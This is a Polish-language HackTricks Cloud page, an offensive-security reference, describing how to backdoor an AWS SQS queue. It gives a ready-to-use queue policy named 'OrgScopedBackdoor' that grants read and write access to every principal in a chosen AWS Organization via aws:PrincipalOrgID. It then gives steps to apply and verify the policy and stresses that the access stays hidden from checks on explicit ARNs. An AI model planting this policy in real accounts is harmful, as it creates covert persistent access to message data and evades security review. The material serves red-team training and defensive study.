AWS - SQS OrgID Policy Backdoor
Tip
Ucz się & ćwicz AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Ucz się & ćwicz GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Ucz się & ćwicz Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Wspieraj HackTricks
- Sprawdź subscription plans!
- Dołącz do 💬 Discord group lub telegram group lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Podziel się hacking tricks, zgłaszając PRy do HackTricks i HackTricks Cloud github repos.
Wykorzystaj politykę zasobu kolejki SQS, aby cicho przyznać uprawnienia Send, Receive i ChangeMessageVisibility dowolnemu principalowi należącemu do docelowej AWS Organization, używając warunku aws:PrincipalOrgID. Tworzy to ukrytą ścieżkę ograniczoną do organizacji (org-scoped), która często omija zabezpieczenia sprawdzające tylko jawne ARNy kont lub ról albo star principals.
Backdoor policy (dołącz do polityki kolejki SQS)
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "OrgScopedBackdoor",
"Effect": "Allow",
"Principal": "*",
"Action": [
"sqs:ReceiveMessage",
"sqs:SendMessage",
"sqs:ChangeMessageVisibility",
"sqs:GetQueueAttributes"
],
"Resource": "arn:aws:sqs:REGION:ACCOUNT_ID:QUEUE_NAME",
"Condition": {
"StringEquals": { "aws:PrincipalOrgID": "o-xxxxxxxxxx" }
}
}
]
}
Kroki
- Uzyskaj Organization ID za pomocą AWS Organizations API.
- Pobierz ARN kolejki SQS i ustaw queue policy tej kolejki, zawierającą powyższe statement.
- Z dowolnego principal należącego do tej Organization wyślij i odbierz wiadomość z kolejki, aby zweryfikować dostęp.
Wpływ
- Ukryty dostęp w skali całej organizacji do odczytu i zapisu wiadomości SQS z dowolnego konta w określonej AWS Organization.
Tip
Ucz się & ćwicz AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Ucz się & ćwicz GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Ucz się & ćwicz Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Wspieraj HackTricks
- Sprawdź subscription plans!
- Dołącz do 💬 Discord group lub telegram group lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Podziel się hacking tricks, zgłaszając PRy do HackTricks i HackTricks Cloud github repos.
HackTricks Cloud

